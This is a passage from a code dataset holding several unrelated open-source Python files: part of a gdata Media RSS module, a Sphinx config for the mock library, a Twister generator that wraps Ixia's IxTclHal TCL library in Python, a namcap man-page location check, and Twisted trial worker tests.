extension_attributes: dict A dictionary of attribute value string pairs
"""
self.term = term
self.scheme = scheme
self.label = label
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
class Group(MediaBaseElement):
"""Container element for all media elements.
The <media:group> element can appear as a child of an album, photo or
video entry."""
_tag = 'group'
_children = atom.AtomBase._children.copy()
_children['{%s}content' % MEDIA_NAMESPACE] = ('content', [Content,])
_children['{%s}credit' % MEDIA_NAMESPACE] = ('credit', Credit)
_children['{%s}description' % MEDIA_NAMESPACE] = ('description', Description)
_children['{%s}keywords' % MEDIA_NAMESPACE] = ('keywords', Keywords)
_children['{%s}thumbnail' % MEDIA_NAMESPACE] = ('thumbnail', [Thumbnail,])
_children['{%s}title' % MEDIA_NAMESPACE] = ('title', Title)
_children['{%s}category' % MEDIA_NAMESPACE] = ('category', [Category,])
_children['{%s}duration' % YOUTUBE_NAMESPACE] = ('duration', Duration)
_children['{%s}private' % YOUTUBE_NAMESPACE] = ('private', Private)
_children['{%s}player' % MEDIA_NAMESPACE] = ('player', Player)
def __init__(self, content=None, credit=None, description=None, keywords=None,
thumbnail=None, title=None, duration=None, private=None,
category=None, player=None, extension_elements=None,
extension_attributes=None, text=None):
MediaBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
self.content=content
self.credit=credit
self.description=description
self.keywords=keywords
self.thumbnail=thumbnail or []
self.title=title
self.duration=duration
self.private=private
self.category=category or []
self.player=player
def GroupFromString(xml_string):
return atom.CreateClassFromXMLString(Group, xml_string)
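# Usage sketch (illustrative only): parse a <media:group> fragment. The XML
# below is a minimal, hypothetical example, not taken from a real feed.
#
#   xml = ('<media:group xmlns:media="http://search.yahoo.com/mrss/">'
#          '<media:title type="plain">Lake Como</media:title>'
#          '</media:group>')
#   group = GroupFromString(xml)
#   print group.title.text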
| apache-2.0 |
mikelalcon/bazel | third_party/py/mock/docs/conf.py | 108 | 6310 | # -*- coding: utf-8 -*-
#
# Mock documentation build configuration file, created by
# sphinx-quickstart on Mon Nov 17 18:12:00 2008.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
import sys, os
sys.path.insert(0, os.path.abspath('..'))
from mock import __version__
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.append(os.path.abspath('some/directory'))
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.doctest']
doctest_global_setup = """
import os
import sys
import mock
from mock import * # yeah, I know :-/
import unittest2
import __main__
if os.getcwd() not in sys.path:
sys.path.append(os.getcwd())
# keep a reference to __main__
sys.modules['__main'] = __main__
class ProxyModule(object):
def __init__(self):
self.__dict__ = globals()
sys.modules['__main__'] = ProxyModule()
"""
doctest_global_cleanup = """
sys.modules['__main__'] = sys.modules['__main']
"""
html_theme = 'nature'
html_theme_options = {}
# Add any paths that contain templates here, relative to this directory.
#templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.txt'
# The master toctree document.
master_doc = 'index'
# General substitutions.
project = u'Mock'
copyright = u'2007-2012, Michael Foord & the mock team'
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# The short X.Y version.
version = __version__[:3]
# The full version, including alpha/beta/rc tags.
release = __version__
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directories, that shouldn't be searched
# for source files.
exclude_trees = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = False
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'friendly'
# Options for HTML output
# -----------------------
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
#html_style = 'adctheme.css'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
html_use_modindex = False
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'Mockdoc'
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
latex_font_size = '12pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
latex_documents = [
('index', 'Mock.tex', u'Mock Documentation',
u'Michael Foord', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
latex_use_modindex = False | apache-2.0 |
Luxoft/Twister | lib/Ixia/generate.py | 2 | 15483 | #!/usr/bin/env python
# File: generate.py ; This file is part of Twister.
# version: 2.003
# Copyright (C) 2013 , Luxoft
# Authors:
# Adrian Toader <[email protected]>
# Andrei Costachi <[email protected]>
# Andrei Toma <[email protected]>
# Cristi Constantin <[email protected]>
# Daniel Cioata <[email protected]>
# Mihail Tudoran <[email protected]>
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
This file generates Ixia Library wrapper in Python, using TCL functions from IxTclHal.
Params: - IxOS TCL lib path
- IP address of Ixia chassis
'''
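# Example invocation (both the library path and the address are illustrative):
#   python generate.py /opt/ixia/lib/ixTcl1.0 10.0.0.5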
from Tkinter import Tcl
from collections import OrderedDict
import re
import socket
import sys
import os
chassis_ip = '10.100.100.45'
tcl_lib_path = '/home/twister/ixos/ixia/lib/ixTcl1.0'
if len(sys.argv) < 3:
print 'Usage: python generate.py <ixos_tcl_lib_path> <chassis_ip_address>'
exit()
tcl_lib_path = sys.argv[1]
chassis_ip = sys.argv[2]
# some minimal checks on IP address
if chassis_ip.count('.') < 3:
print 'ERROR: IP address not valid !'
exit()
try:
socket.inet_aton(chassis_ip)
except socket.error:
print 'ERROR: IP address not valid !'
exit()
# check if IxOS tcl lib path exists
if tcl_lib_path[-1] == '/':
tcl_lib_path = tcl_lib_path.rstrip('/')
if not os.path.isdir(tcl_lib_path):
print 'ERROR: IxOS tcl lib path doesn\'t exist'
exit()
tcl = Tcl()
tcl.eval('package req IxTclHal')
tcl.eval('ixConnectToTclServer ' + chassis_ip)
tcl.eval('ixConnectToChassis ' + chassis_ip)
# # # # # # # #
HEAD = """
from Tkinter import Tcl
t = Tcl()
t.eval('package req IxTclHal')
true = True
false = False
yes = True
no = False
none = None
"""
TAIL = """
def ix_exec(cmd):
# This is used for executing custom TCL commands
r = t.eval(cmd)
return r
if __name__ == "__main__":
chassis_ip = '%s'
funcs = [x[0] for x in locals().items() if callable( x[1] )]
# print sorted(funcs)
print 'Found {} functions!'.format(len(funcs))
print 'Is this UNIX?', isUNIX()
print 'Connect to TCL Server:', ixConnectToTclServer(chassis_ip)
print 'Connect to Chassis', ixConnectToChassis(chassis_ip)
print 'Config chassis...'
portList = ''
chassis('get ' + chassis_ip)
py_chassis = chassis('cget -id')
print py_chassis
print 'Config card...'
py_card = 1
card('setDefault')
card('config -txFrequencyDeviation 0')
print py_card
print 'Config port...'
py_port = 1
port('setFactoryDefaults {} {} {}'.format(py_chassis, py_card, py_port))
port('config -speed 100')
port('config -duplex full')
port('config -flowControl false')
print py_port
print 'Config stat...'
stat('setDefault')
stat('config -mode statNormal')
stat('config -enableValidStats false')
stat('config -enableProtocolServerStats true')
stat('config -enableArpStats true')
stat('config -enablePosExtendedStats true')
stat('config -enableDhcpStats false')
stat('config -enableDhcpV6Stats false')
stat('config -enableEthernetOamStats false')
print 'Done.'
print 'Config flexibleTimestamp...'
flexibleTimestamp('setDefault')
flexibleTimestamp('config -type timestampBeforeCrc')
flexibleTimestamp('config -offset 23')
print 'Done.'
print 'Config filter...'
ix_filter('setDefault')
ix_filter('config -captureTriggerDA anyAddr')
ix_filter('config -captureTriggerSA anyAddr')
ix_filter('config -captureTriggerPattern anyPattern')
ix_filter('config -captureTriggerError errAnyFrame')
print 'Done.'
print 'Config filterPallette...'
filterPallette('setDefault')
filterPallette('config -DA1 "00 00 00 00 00 00"')
filterPallette('config -DAMask1 "00 00 00 00 00 00"')
filterPallette('config -DA2 "00 00 00 00 00 00"')
filterPallette('config -DAMask2 "00 00 00 00 00 00"')
filterPallette('config -SA1 "00 00 00 00 00 00"')
filterPallette('config -SAMask1 "00 00 00 00 00 00"')
filterPallette('config -SA2 "00 00 00 00 00 00"')
filterPallette('config -SAMask2 "00 00 00 00 00 00"')
filterPallette('config -pattern1 "DE ED EF FE AC CA"')
filterPallette('config -patternMask1 "00 00 00 00 00 00"')
print 'Done.'
print 'Config capture...'
capture('setDefault')
capture('config -fullAction lock')
capture('config -sliceSize 8191')
print 'Done.'
print 'Config ipAddressTable...'
ipAddressTable('setDefault')
ipAddressTable('config -defaultGateway "0.0.0.0"')
print 'Done.'
print 'Config arpServer...'
arpServer('setDefault')
arpServer('config -retries 3')
arpServer('config -mode arpGatewayOnly')
arpServer('config -rate 208333')
arpServer('config -requestRepeatCount 3')
print 'Done.'
print 'Config interfaceTable...'
interfaceTable('setDefault')
interfaceTable('config -dhcpV4RequestRate 0')
interfaceTable('config -dhcpV6RequestRate 0')
interfaceTable('config -dhcpV4MaximumOutstandingRequests 100')
interfaceTable('config -dhcpV6MaximumOutstandingRequests 100')
#interfaceTable('config -fcoeRequestRate 500')
print 'Done.'
print 'Clear All Interfaces ...'
interfaceTable('clearAllInterfaces')
print 'Done.'
print 'Config protocolServer...'
protocolServer('setDefault')
protocolServer('config -enableArpResponse true')
protocolServer('config -enablePingResponse false')
print 'Done.'
print 'Config oamPort...'
oamPort('setDefault')
oamPort('config -enable false')
oamPort('config -macAddress "00 00 AB BA DE AD"')
oamPort('config -enableLoopback false')
oamPort('config -enableLinkEvents false')
print 'Done.'
print 'Call ixWritePortsToHardware and ixCheckLinkState ...'
# lappend portList [list $chassis $card $port] # ???
ixWritePortsToHardware(portList, None)
ixCheckLinkState(portList)
print 'Done.'
#
""" % (chassis_ip)
# # # # # # # #
def tcl_convert(variable):
"""
This returns the TCL value converted into Pyton string repr.
alnum
Any Unicode alphabet or digit character.
alpha
Any Unicode alphabet character.
ascii
Any character with a value less than \u0080 (those that are in the 7-bit ascii range).
boolean
Any of the forms allowed to Tcl_GetBoolean.
In the case of boolean, true and false, if the function will return 0, then the varname will always be set to 0,
due to the varied nature of a valid boolean value.
control
Any Unicode control character.
digit
Any Unicode digit character. Note that this includes characters outside of the [0-9] range.
double
Any of the valid forms for a double in Tcl, with optional surrounding \
whitespace. In case of under/overflow in the value,
0 is returned and the varname will contain -1.
false
Any of the forms allowed to Tcl_GetBoolean where the value is false.
graph
Any Unicode printing character, except space.
integer
Any of the valid forms for an ordinary integer in Tcl, with optional \
surrounding whitespace. In case of under/overflow in the value,
0 is returned and the varname will contain -1.
lower
Any Unicode lower case alphabet character.
print
Any Unicode printing character, including space.
punct
Any Unicode punctuation character.
space
Any Unicode space character.
true
Any of the forms allowed to Tcl_GetBoolean where the value is true.
upper
Any upper case alphabet character in the Unicode character set.
wordchar
Any Unicode word character. That is any alphanumeric character, and \
any Unicode connector punctuation characters (e.g. underscore).
xdigit
Any hexadecimal digit character ([0-9A-Fa-f]).
"""
global tcl
types = OrderedDict([
['integer', int],
['digit', int],
['double', float],
['true', bool],
['false', bool],
['boolean', bool],
['xdigit', str],
['alnum', str],
['alpha', str],
['ascii', str],
['control', str],
['graph', str],
['lower', str],
['print', str],
['punct', str],
['space', str],
['upper', str],
['wordchar', str],
])
for tcl_type, py_type in types.iteritems():
found = tcl.eval("string is {} -strict ${}".format(tcl_type, variable))
found = int(found)
if found:
value = tcl.getvar('vDefaultArg')
value = str(value)
print 'Converting value `{}` into TCL type `{}`.'.format(value, tcl_type)
if value == 'false' or value == 'no':
return False
elif py_type == str:
return '"{}"'.format(value)
else:
return value
return '!!!'
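# Illustrative behaviour of tcl_convert(), assuming the TCL variable
# vDefaultArg holds the value shown on the left:
#   42        -> 42             (TCL integer, emitted as-is)
#   3.14      -> 3.14           (TCL double, emitted as-is)
#   true/yes  -> the literal value (the generated module defines true/yes = True)
#   false/no  -> False
#   foo bar   -> '"foo bar"'    (anything else becomes a quoted string)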
# # # # # # # #
IX_VARS = {
'from': 'ix_from',
'for': 'ix_for',
'while': 'ix_while',
'file': 'ix_file',
'object': 'ix_object',
'range': 'ix_range',
'map': 'ix_map',
'filter': 'ix_filter',
}
def fix_tcl_var(variable):
""" replace TCL variable """
global IX_VARS
if variable in IX_VARS:
return IX_VARS[variable]
return variable
def fix_tcl_func(func):
""" change TCL function """
global IX_VARS
func = func.replace('::', '_')
if func in IX_VARS:
return IX_VARS[func]
return func
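# Examples of the renaming performed above (derived from IX_VARS):
#   fix_tcl_var('filter')            -> 'ix_filter'  (reserved Python name)
#   fix_tcl_var('port')              -> 'port'       (unchanged)
#   fix_tcl_func('ixUtils::doThing') -> 'ixUtils_doThing' (hypothetical proc name)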
# # # # # # # #
'''
Get Ixia library version from ixTclHal.tcl file
'''
ixos_version = ''
version_file = tcl_lib_path + '/ixTclHal.tcl'
try:
with open(version_file, 'r') as v_file:
for line in v_file:
if line.startswith('package provide IxTclHal'):
ixos_version = line.split()[-1]
break
except:
print 'ERROR: Cannot get IxOS version. Exiting !'
exit()
# # # # # # # #
'''
Generate functions.txt file from file tclIndex
'''
FUNCTIONS = []
tcl_index_file = tcl_lib_path + '/tclIndex'
try:
for line in open(tcl_index_file).readlines():
if line.startswith('set auto_index(', 0):
line = line.replace('set auto_index(','')
FUNCTIONS.append(line.split(')')[0])
except:
pass
# # # # # # # #
'''
Update functions.txt file from file ixTclSetup.tcl
'''
ix_tcl_setup = tcl_lib_path + '/ixTclSetup.tcl'
try:
file_content = open(ix_tcl_setup, 'r').read()
# get entries from ixTclHal::noArgList
no_arg_list = re.findall('set ixTclHal::noArgList(.*?)\{(.+?)\}',file_content, re.M | re.S)
FUNCTIONS.extend(no_arg_list[0][1].replace('\\','').split())
# get entries from ixTclHal::pointerList
pointer_list = re.findall('set ixTclHal::pointerList(.*?)\{(.+?)\}',file_content, re.M | re.S)
FUNCTIONS.extend(pointer_list[0][1].replace('\\','').split())
# get entries from ixTclHal::command
command_list = re.findall('set ixTclHal::commandList(.*?)\{(.+?)\}',file_content, re.M | re.S)
FUNCTIONS.extend(command_list[0][1].replace('\\','').split())
except:
pass
try:
with open('functions.txt', 'w') as OUTPUT:
OUTPUT.write('\n'.join(FUNCTIONS))
except:
pass
# # # # # # # #
FUNCTIONS = []
for line in open('functions.txt').readlines():
if not line.strip():
continue
if '::' in line:
continue
func_name = line.strip() # TCL Function name
tcl_args = []
tcl_args_long = []
pyc_args = []
pyc_args_long = []
tmpl = '# Function `{}` is invalid'.format(func_name) # Default string, says the func is invalid
tcl.eval('set vDefaultArg ""')
defaultArgFound = False
defaultArgs = [] # The list of mandatory arguments
try:
# Enable TCL Function. RISK: this executes the function!
try:
tcl.eval(func_name)
except:
pass
proc_args = tcl.eval('info args ' + func_name)
for arg in proc_args.split():
has_default = tcl.eval('info default %s %s vDefaultArg' % (func_name, arg))
arg_fixed = fix_tcl_var(arg)
# Args for executing
tcl_args.append(arg)
# Args for calling the TCL function
pyc_args.append(arg_fixed)
# If this argument has a default value
if int(has_default) and tcl.getvar('vDefaultArg'):
defaultArgFound = True
# Args for comment
tcl_args_long.append('%s {%s}' % (arg, str(tcl.getvar('vDefaultArg'))))
# Args for defining Python functions
pyc_args_long.append('%s=%s' % (arg_fixed, str(tcl_convert('vDefaultArg'))))
else:
tcl_args_long.append(arg)
if not defaultArgFound:
pyc_args_long.append(arg_fixed)
else:
defaultArgs.append(arg_fixed)
pyc_args_long.append('%s=None' % (arg_fixed))
# Reset variable for the next cycle
tcl.eval('set vDefaultArg ""')
leng = len(tcl_args)
tcl_args = ', '.join(tcl_args)
tcl_args_long = ' '.join(tcl_args_long)
pyc_args = ', '.join(pyc_args)
pyc_args_long = ', '.join(pyc_args_long)
except Exception, e:
print('>>> Cannot create function `{}`, exception: `{}`!\n'.format(func_name, e))
continue
if defaultArgs:
defaultArgs = '\n'.join([ ' if {0} is None: print "TCL argument ' \
' `{0}` cannot be empty!"; return False'.format(x) for x in defaultArgs ])
tmpl = """
def {py}({py_arg_l}):
'''\n Method Name : {tcl}\n Arguments : {tcl_arg_l}
{def_arg}\n '''
r = t.eval("{tcl} {le}".format({py_arg}))
return r
""".format(py=fix_tcl_func(func_name), tcl=func_name, py_arg=pyc_args, py_arg_l=pyc_args_long,
tcl_arg=tcl_args, tcl_arg_l=tcl_args_long, le='{} '*leng, def_arg=defaultArgs)
else:
tmpl = """
def {py}({py_arg_l}):
'''\n Method Name : {tcl}\n Arguments : {tcl_arg_l} \n '''
r = t.eval("{tcl} {le}".format({py_arg}))
return r
""".format(py=fix_tcl_func(func_name), tcl=func_name, py_arg=pyc_args, py_arg_l=pyc_args_long,
tcl_arg=tcl_args, tcl_arg_l=tcl_args_long, le='{} '*leng)
FUNCTIONS.append(tmpl)
#
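# For reference, a wrapper generated from the template above roughly looks
# like this (the function and argument names depend on the TCL procs that
# are discovered at run time, so the example is only illustrative):
#
#   def ixConnectToChassis(ipAddress):
#       '''
#       Method Name : ixConnectToChassis
#       Arguments : ipAddress
#       '''
#       r = t.eval("ixConnectToChassis {} ".format(ipAddress))
#       return r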
output_file = 'TscIxPythonLib_v{}.py'.format(ixos_version)
OUTPUT = open(output_file, 'w')
OUTPUT.write(HEAD)
OUTPUT.write('\n'.join(FUNCTIONS))
OUTPUT.write(TAIL)
OUTPUT.close()
# Eof()
| apache-2.0 |
charactory/namcap | Namcap/fhsmanpages.py | 2 | 1594 | #
# namcap rules - fhsmanpages
# Copyright (C) 2008 Aaron Griffin <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
import os
import tarfile
class package:
def short_name(self):
return "fhs-manpages"
def long_name(self):
return "Verifies correct installation of man pages"
def prereq(self):
return "tar"
def analyze(self, pkginfo, tar):
gooddir = 'usr/share/man'
bad_dir = 'usr/man'
ret = [[],[],[]]
for i in tar.getmembers():
if i.name.startswith(bad_dir):
ret[0].append("Non-FHS man page (" + i.name + ") found. Use /usr/share/man instead")
elif not i.name.startswith(gooddir):
#Check everything else to see if it has a 'man' path component
for part in i.name.split(os.sep):
if part == "man":
ret[1].append("Potential non-FHS man page (" + i.name + ") found.")
return ret
def type(self):
return "tarball"
# vim: set ts=4 sw=4 noet:
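# Rough usage sketch (namcap normally drives this rule itself; the package
# path below is purely illustrative):
#   import tarfile
#   tar = tarfile.open('/var/cache/pacman/pkg/foo-1.0-1-any.pkg.tar.gz')
#   errors, warnings, infos = package().analyze(None, tar)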
| gpl-2.0 |
dparlevliet/zelenka-report-storage | server-db/twisted/trial/_dist/test/test_worker.py | 33 | 14642 | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Test for distributed trial worker side.
"""
import os
from cStringIO import StringIO
from zope.interface.verify import verifyObject
from twisted.trial.reporter import TestResult
from twisted.trial.unittest import TestCase
from twisted.trial._dist.worker import (
LocalWorker, LocalWorkerAMP, LocalWorkerTransport, WorkerProtocol)
from twisted.trial._dist import managercommands, workercommands
from twisted.scripts import trial
from twisted.test.proto_helpers import StringTransport
from twisted.internet.interfaces import ITransport, IAddress
from twisted.internet.defer import fail, succeed
from twisted.internet.main import CONNECTION_DONE
from twisted.internet.error import ConnectionDone
from twisted.python.failure import Failure
from twisted.protocols.amp import AMP
class FakeAMP(AMP):
"""
A fake amp protocol.
"""
class WorkerProtocolTestCase(TestCase):
"""
Tests for L{WorkerProtocol}.
"""
def setUp(self):
"""
Set up a transport, a result stream and a protocol instance.
"""
self.serverTransport = StringTransport()
self.clientTransport = StringTransport()
self.server = WorkerProtocol()
self.server.makeConnection(self.serverTransport)
self.client = FakeAMP()
self.client.makeConnection(self.clientTransport)
def test_run(self):
"""
Calling the L{workercommands.Run} command on the client returns a
response with C{success} sets to C{True}.
"""
d = self.client.callRemote(workercommands.Run, testCase="doesntexist")
def check(result):
self.assertTrue(result['success'])
d.addCallback(check)
self.server.dataReceived(self.clientTransport.value())
self.clientTransport.clear()
self.client.dataReceived(self.serverTransport.value())
self.serverTransport.clear()
return d
def test_start(self):
"""
The C{start} command changes the current path.
"""
curdir = os.path.realpath(os.path.curdir)
self.addCleanup(os.chdir, curdir)
self.server.start('..')
self.assertNotEqual(os.path.realpath(os.path.curdir), curdir)
class LocalWorkerAMPTestCase(TestCase):
"""
Test case for distributed trial's manager-side local worker AMP protocol
"""
def setUp(self):
self.managerTransport = StringTransport()
self.managerAMP = LocalWorkerAMP()
self.managerAMP.makeConnection(self.managerTransport)
self.result = TestResult()
self.workerTransport = StringTransport()
self.worker = AMP()
self.worker.makeConnection(self.workerTransport)
config = trial.Options()
self.testName = "twisted.doesnexist"
config['tests'].append(self.testName)
self.testCase = trial._getSuite(config)._tests.pop()
self.managerAMP.run(self.testCase, self.result)
self.managerTransport.clear()
def pumpTransports(self):
"""
Sends data from C{self.workerTransport} to C{self.managerAMP}, and then
data from C{self.managerTransport} back to C{self.worker}.
"""
self.managerAMP.dataReceived(self.workerTransport.value())
self.workerTransport.clear()
self.worker.dataReceived(self.managerTransport.value())
def test_runSuccess(self):
"""
Run a test, and succeed.
"""
results = []
d = self.worker.callRemote(managercommands.AddSuccess,
testName=self.testName)
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertTrue(results)
def test_runExpectedFailure(self):
"""
Run a test, and fail expectedly.
"""
results = []
d = self.worker.callRemote(managercommands.AddExpectedFailure,
testName=self.testName, error='error',
todo='todoReason')
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual(self.testCase, self.result.expectedFailures[0][0])
self.assertTrue(results)
def test_runError(self):
"""
Run a test, and encounter an error.
"""
results = []
d = self.worker.callRemote(managercommands.AddError,
testName=self.testName, error='error',
errorClass='exceptions.ValueError',
frames=[])
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual(self.testCase, self.result.errors[0][0])
self.assertTrue(results)
def test_runErrorWithFrames(self):
"""
L{LocalWorkerAMP._buildFailure} recreates the C{Failure.frames} from
the C{frames} argument passed to C{AddError}.
"""
results = []
d = self.worker.callRemote(managercommands.AddError,
testName=self.testName, error='error',
errorClass='exceptions.ValueError',
frames=["file.py", "invalid code", "3"])
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual(self.testCase, self.result.errors[0][0])
self.assertEqual(
[('file.py', 'invalid code', 3, [], [])],
self.result.errors[0][1].frames)
self.assertTrue(results)
def test_runFailure(self):
"""
Run a test, and fail.
"""
results = []
d = self.worker.callRemote(managercommands.AddFailure,
testName=self.testName, fail='fail',
failClass='exceptions.RuntimeError',
frames=[])
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual(self.testCase, self.result.failures[0][0])
self.assertTrue(results)
def test_runSkip(self):
"""
Run a test, but skip it.
"""
results = []
d = self.worker.callRemote(managercommands.AddSkip,
testName=self.testName, reason='reason')
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual(self.testCase, self.result.skips[0][0])
self.assertTrue(results)
def test_runUnexpectedSuccesses(self):
"""
Run a test, and succeed unexpectedly.
"""
results = []
d = self.worker.callRemote(managercommands.AddUnexpectedSuccess,
testName=self.testName,
todo='todo')
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual(self.testCase, self.result.unexpectedSuccesses[0][0])
self.assertTrue(results)
def test_testWrite(self):
"""
L{LocalWorkerAMP.testWrite} writes the data received to its test
stream.
"""
results = []
stream = StringIO()
self.managerAMP.setTestStream(stream)
d = self.worker.callRemote(managercommands.TestWrite,
out="Some output")
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual("Some output\n", stream.getvalue())
self.assertTrue(results)
def test_stopAfterRun(self):
"""
L{LocalWorkerAMP.run} calls C{stopTest} on its test result once the
C{Run} commands has succeeded.
"""
result = object()
stopped = []
def fakeCallRemote(command, testCase):
return succeed(result)
self.managerAMP.callRemote = fakeCallRemote
class StopTestResult(TestResult):
def stopTest(self, test):
stopped.append(test)
d = self.managerAMP.run(self.testCase, StopTestResult())
self.assertEqual([self.testCase], stopped)
return d.addCallback(self.assertIdentical, result)
class FakeAMProtocol(AMP):
"""
A fake implementation of L{AMP} for testing.
"""
id = 0
dataString = ""
def dataReceived(self, data):
self.dataString += data
def setTestStream(self, stream):
self.testStream = stream
class FakeTransport(object):
"""
A fake process transport implementation for testing.
"""
dataString = ""
calls = 0
def writeToChild(self, fd, data):
self.dataString += data
def loseConnection(self):
self.calls += 1
class LocalWorkerTestCase(TestCase):
"""
Tests for L{LocalWorker} and L{LocalWorkerTransport}.
"""
def test_childDataReceived(self):
"""
L{LocalWorker.childDataReceived} forwards the received data to linked
L{AMP} protocol if the right file descriptor, otherwise forwards to
C{ProcessProtocol.childDataReceived}.
"""
fakeTransport = FakeTransport()
localWorker = LocalWorker(FakeAMProtocol(), '.', 'test.log')
localWorker.makeConnection(fakeTransport)
localWorker._outLog = StringIO()
localWorker.childDataReceived(4, "foo")
localWorker.childDataReceived(1, "bar")
self.assertEqual("foo", localWorker._ampProtocol.dataString)
self.assertEqual("bar", localWorker._outLog.getvalue())
def test_outReceived(self):
"""
L{LocalWorker.outReceived} logs the output into its C{_outLog} log
file.
"""
fakeTransport = FakeTransport()
localWorker = LocalWorker(FakeAMProtocol(), '.', 'test.log')
localWorker.makeConnection(fakeTransport)
localWorker._outLog = StringIO()
data = "The quick brown fox jumps over the lazy dog"
localWorker.outReceived(data)
self.assertEqual(data, localWorker._outLog.getvalue())
def test_errReceived(self):
"""
L{LocalWorker.errReceived} logs the errors into its C{_errLog} log
file.
"""
fakeTransport = FakeTransport()
localWorker = LocalWorker(FakeAMProtocol(), '.', 'test.log')
localWorker.makeConnection(fakeTransport)
localWorker._errLog = StringIO()
data = "The quick brown fox jumps over the lazy dog"
localWorker.errReceived(data)
self.assertEqual(data, localWorker._errLog.getvalue())
def test_write(self):
"""
L{LocalWorkerTransport.write} forwards the written data to the given
transport.
"""
transport = FakeTransport()
localTransport = LocalWorkerTransport(transport)
data = "The quick brown fox jumps over the lazy dog"
localTransport.write(data)
self.assertEqual(data, transport.dataString)
def test_writeSequence(self):
"""
L{LocalWorkerTransport.writeSequence} forwards the written data to the
given transport.
"""
transport = FakeTransport()
localTransport = LocalWorkerTransport(transport)
data = ("The quick ", "brown fox jumps ", "over the lazy dog")
localTransport.writeSequence(data)
self.assertEqual("".join(data), transport.dataString)
def test_loseConnection(self):
"""
L{LocalWorkerTransport.loseConnection} forwards the call to the given
transport.
"""
transport = FakeTransport()
localTransport = LocalWorkerTransport(transport)
localTransport.loseConnection()
self.assertEqual(transport.calls, 1)
def test_connectionLost(self):
"""
L{LocalWorker.connectionLost} closes the log streams.
"""
class FakeStream(object):
callNumber = 0
def close(self):
self.callNumber += 1
transport = FakeTransport()
localWorker = LocalWorker(FakeAMProtocol(), '.', 'test.log')
localWorker.makeConnection(transport)
localWorker._outLog = FakeStream()
localWorker._errLog = FakeStream()
localWorker.connectionLost(None)
